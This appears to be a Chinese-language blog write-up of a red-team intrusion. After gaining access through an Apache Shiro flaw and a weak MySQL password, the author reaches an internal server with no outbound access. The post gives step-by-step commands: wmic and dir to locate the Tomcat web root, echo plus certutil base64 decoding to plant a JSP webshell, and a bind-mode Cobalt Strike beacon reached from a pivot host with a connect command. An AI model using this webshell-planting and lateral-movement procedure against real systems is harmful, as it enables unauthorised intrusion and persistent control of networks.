场景
shiro打点获取10段服务器权限,在10段机器出网且已上线cs;
172段不出网且反向不通10段,已通过mysql弱口令获取system权限,存在web服务。
上线过程
思路:写入webshell,通过正向马上线cs。
一)开始Getshell
通过web服务获取一个web目录下的文件名:stf-login-bg.jpg
获取所有盘符
wmic logicaldisk get caption,name
通过文件名获取web目录
dir /a /s /b d:\"stf-login-bg.jpg"
根据图片URL确定
D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat7.0.73\webapps\ROOT\static\images\login\stf-login-bg.jpg 为真实web路径,使用 \ 可dir到此路径。
echo配合certutil写入webshell:(注意下方语句包含空格)
//base64编码shell.jsp certutil -encode shell.jsp jsp.txt //echo编码后的内容到web目录 echo xxxx >D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat 7.0.73\\ webapps\\ROOT\\static\\images\\login\\12.txt //解码还原文件 certutil -decode D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\12.txt D:\\apache-tomcat-7.0.73-windows-x64\\apache-tomcat-7.0.73\\webapps\\ROOT\\static\\images\\login\\123.jsp
二)上线cs
新建监听器
生成正向马
通过webshell上传到目标机器并执行,使用跳板机连接,上线cs。
connect 172.20.57.122 28888
相关文章
您必须登录才能参与评论!
立即登录
需要帮助,怎样联系你
什么帮助